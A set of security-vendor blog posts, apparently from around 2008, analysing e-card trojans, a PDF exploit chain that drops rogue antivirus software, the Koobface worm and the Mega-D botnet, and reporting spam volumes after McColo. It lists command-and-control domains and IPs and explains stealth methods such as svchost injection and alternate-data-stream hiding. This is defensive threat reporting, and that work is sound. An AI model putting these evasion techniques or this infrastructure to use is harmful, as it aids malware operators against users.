It seems cyber criminals aren't taking their holidays and in fact this season is their best time to take advantage of sending out their 'unwanted greetings'. We are receiving another 'e-card' spam attack that uses typical subject lines like "An E-card from Steven", "You've got a Happy New Year Greeting Card", "Happy Christmas" or "Merry Christmas greetings for you" that try to lure users into opening these emails.

The link in the email body will point you to a website with a clickable image hosting a backdoor-trojan (an executable using the filename "postcard.exe").

So you might wonder what the trojan does on your computer when you accidentally execute it? Here are some of the things it does:

- It collects email addresses from your PC and will send out 'e-card' spam to those harvested emails.

- It forces your Internet Explorer to lower its security settings. This way, the trojan won't have trouble connecting to the internet.

- It may update itself or download arbitrary files.

- Connects to a list of IP addresses and opens a backdoor in your computer where the trojan author can easily connect.

- Steals information like system configuration and IP addresses.

Fortunately, SpamCensor 292 blocks this type of spam messages.

Yesterday we started receiving ‘eCard’ spam emails all with the subject line ‘You have received an eCard’ and a link to a website.

The website in the link redirects the browser to a second website which is hosting obfuscated JavaScript. Just after the obfuscated section are a couple of lines of plain script:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

Once we de-obfuscate the first section we get the following script:

This adds an element to the current page containing a pdf object. The pdf file that is loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it will download and execute the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rouge antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the users must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.

Administrators should consider blocking access to mp3downloadsplus.com which is hosting the exploit and malware.

Often, criminals use spam with a combination of social engineering tactics to propagate their malware. However, hackers are increasingly looking for newer, alternative ways to infect computers. Over the past few weeks, we have received reports of malware that exploits social networking sites like Facebook, Bebo, MySpace and Friendster as a more 'trendy' means of infection. This malware is known as Koobface.

If you are a fan of these social networking websites, chances are you have seen these type of messages:

A sample Koobface message in Facebook

A sample Koobface message in Friendster

If you click on one of these links, you will get redirected to a site that hosts the malware and encounter a fake 'video' claiming that you need to upgrade your Flash version.

In this case, the fake Flash installer downloads the Koobface bot (an executable file).

Like any other bot, Koobface connects and receives instructions from its command and control (C&C) server. It detects when a user has logged on and has an active session connected to a social networking site. Information is then sent to its command and control server. Koobface uses that session to collect all the user's friends. A spamming template is then received from Koobface's C&C server and it sends messages to all the user's friends it collected.

With millions of users getting hooked on these social networking sites, it is unsurprising how successful Koobface has been infecting users in this way.

For more detailed information on Koobface, ThreatExpert has an excellent analysis of this malware.

In a previous blog, we talked about the return of the Mega-D botnet (a.k.a Ozdok) in the wake of the McColo shutdown, which is one of the major botnet responsible for sending close to 50% of all spams. Currently, we thought we would have a closer look at this bot.

Mega-D has a unique way of hiding itself from detection. It tries to fool users by creating a new process of Svchost.exe, (a legitimate component of Windows) and injects its code into this process.

After creating a fake but legitmate looking Windows process, Mega-D copies itself into the Windows system directory as an Alternate Data Stream(ADS) using the filename “svchost.exe:ext.exe”. This is a clever method of hiding malicious files from detection since neither Windows Explorer nor cmd.exe will reveal ADS streams, unless using a special tool such as Streams from Sysinternals.

Mega-D then creates a service for the drop file to auto-execute on system startup. “FCI” is the display name for this specific Mega-D sample (md5 hash: EB6C85A3D3A17CDC4DC50CF018322A59, packed using UPX).

It looks like this in the Services management console once registered:

After Mega-D transfer its control to the injected code, it then terminates and deletes the executed malware to further reduce its footprint and the likelihood of detection. With the injected code, Mega-D performs a DNS query on one of the following domains:

• mazerattikrak.info
• host.violenzarja.biz
• m.violenzarja.biz
• pilimerkazana.biz
• jopiterazania.net
• upoyansa.com
• hotopikalar.info
• fhkacwd9aalg.info
• beztakrezt.info

Once the DNS query succeed, Mega-D will send a test message:

Here is a sample SMTP transaction when Mega-D sends a test message:

Older samples tries to connect to majzufaiuq.info which is currently an unregistered domain. It will then attempt to connect to its C&C server and we observed Mega-D connect to addresses using port 80:

• 72.21.32.138
• 98.126.40.74
• 216.32.90.186

It was also observed that it downloaded an updated binary from 98.126.40.74:80 / mss32.exe (please note: link was intentionally broken).

The message body is usually in HTML format only with themes focus on fake designer products, male enlargement, sexual enhancement, current news topic and using NDR subject lines like:

Delivery Status Notification
Delivery Status Notification (Failure)
RE: Message
RE: Order Status

Here's a sample spam from Mega-D:

In summary, the Mega-D malware uses sophisticated methods for optimizing stealth. It is difficult to identify, even by experienced users, without specialized analysis tools. It is designed to be flexible when attempting connections with Command and Control Servers and uses a range of methods to update itself. It is a very professionally written piece of malware.

Spammers are using Google Notebook to host links to the web sites their spam is trying to promote. Google Notebook is a service that allows users to collect clips of information as they browse the web and paste it into their notebook. Notebooks can be made public so others can view them. The spammers are creating notebooks with the spam content and then spamming out links to the notebook.

Because the links in the spam emails are to a legitimate domain, URL filtering is less likely to block the email and users are going to be less suspicious about clicking on the link. The link in the above email goes to the notebook page below.

Clicking on the ‘ENTER HERE >>’ link in the notebook takes the user to a page advertising various adult websites.

Spammers have previously used the same technique with Blogspot and Windows Live Spaces used to host spam content. This is yet another example of spammers abusing free services to achieve their goals. It is important that providers such as Google and Microsoft monitor the public content that they are hosting to prevent their services from harming other internet users.

Following the McColo network takedown, spam volume has been clawing its way back up. Our daily Spam Volume Index (SVI) – which measures the volume of spam arriving to a bundle of domains we monitor – has doubled since the low point immediately after the McColo shutdown on 11 November.

Initially we saw some revived activity from Rustock, which now appears to have gone quiet. On the other hand, Mega-D has bounced back and is now spamming heavily. Mega-D (a.k.a Ozdok) now has an updated spambot which no longer uses its former distinctive hard-coded template. Yesterday, spam from Mega-D made up some 48% of the spam arriving at our spam traps. It is now using this style header:

To: <lka@xxx.com>
Subject: Your order
From: <lka@xxx.com>
MIME-Version: 1.0
Importance: High
Content-Type: text/html

Interestingly, this is the exact same header template we saw Rustock use just prior to the McColo takedown – reinforcing the idea that the same group is behind both botnets. Of course, the other possibility is that there is a good deal of mimicking going on.

Note that the header uses the same From: and To: address. While not a new trick, this has been causing some problems to people who have whitelisted their own entire domains. In short, avoid doing this. If you are a MailMarshal customer, check out the anti-spoofing feature.

Thanks to the research team at FireEye for supplying us with an updated Mega-D sample.

It was perhaps inevitable. After some two weeks in the wilderness, most of the spam botnets that were affected by the shutdown of McColo two weeks ago have begun to show signs of life.

Yesterday we saw both Mega-D and Rustock begin to spam again. Mega-D had a brief spurt but has since stopped. On the other hand, Rustock returned in force yesterday and is spamming in relatively large volumes, mainly with links to Canadian Pharmacy websites. Gheg, a smaller botnet that was also using McColo to host its control servers, is also spamming again.

We have also seen a small volume of spam trickling in from Srizbi over the last several days, which may have originated from bots that used a control server not hosted by McColo. Despite reports elsewhere to the contrary, we have yet to see Srizbi spam in a significant way. Recent evidence suggests that the operators of Srizbi may have relocated their servers and regained control. If so, we may yet see increased spam volumes from this beast in the near future.

Spam volumes, as you can see in our Daily Spam Volume Index below, are still way below what they were before McColo was taken offline. However over the last two days the volume has increased noticeably, which is almost single-handedly due to the return of Rustock.

.

After last week's sudden shutdown of the McColo network, which hosted a number of botnet command and control servers, spam remains way down, as you can see reflected in the Spam Volume Index from our spam statistics page:

The Srizbi, Rustock and Mega-D botnets have ground to a halt, again reflected in their downward trends in our Spam by Spambot graph below. Note: the graph contains last weeks complete data and incorporates Srizbi, Rustock and Mega-D spam from earlier in the week when McColo was still up. Next week, assuming the current situation stays the same, the lines will plummet further. As these botnets have dropped away, others botnets have proportionally risen in the mix, notably Pushdo, Bobax and Grum.

The impact of Srizbi dropping out is huge. The folks at FireEye recently produced data suggesting the number of Srizbi bots is at least 450,000. In our labs, we have seen individual Srizbi bots send up to 24,000 spam messages per hour. Any way you do the math, you get a big number. Conservatively, we think Srizbi, when it was going, was capable of some 60-80 billion spams per day. As you can see in the above graph Srizbi was responsible for 30-50% of spam that we track.

Despite the victory last week, we expect the botnets to bounce back in some form. Earlier in the year we saw Mega-D recover from a 'busted' control server which saw it out of action for 10 days. Srizbi too, could recover. There are signs that Srizbi's fallback mechanism may be cleverer than we first thought.

Over the longer term, the botnet operators will learn from this incident and probably evolve their control systems. They may adopt a more resilient peer-to-peer or layered model where control servers are harder to access and spread among many hosts. However it develops, the key challenge for all in the security community is to keep exposing and maintaining the pressure on these botnets. As last week's events show, it can have a positive impact on spam.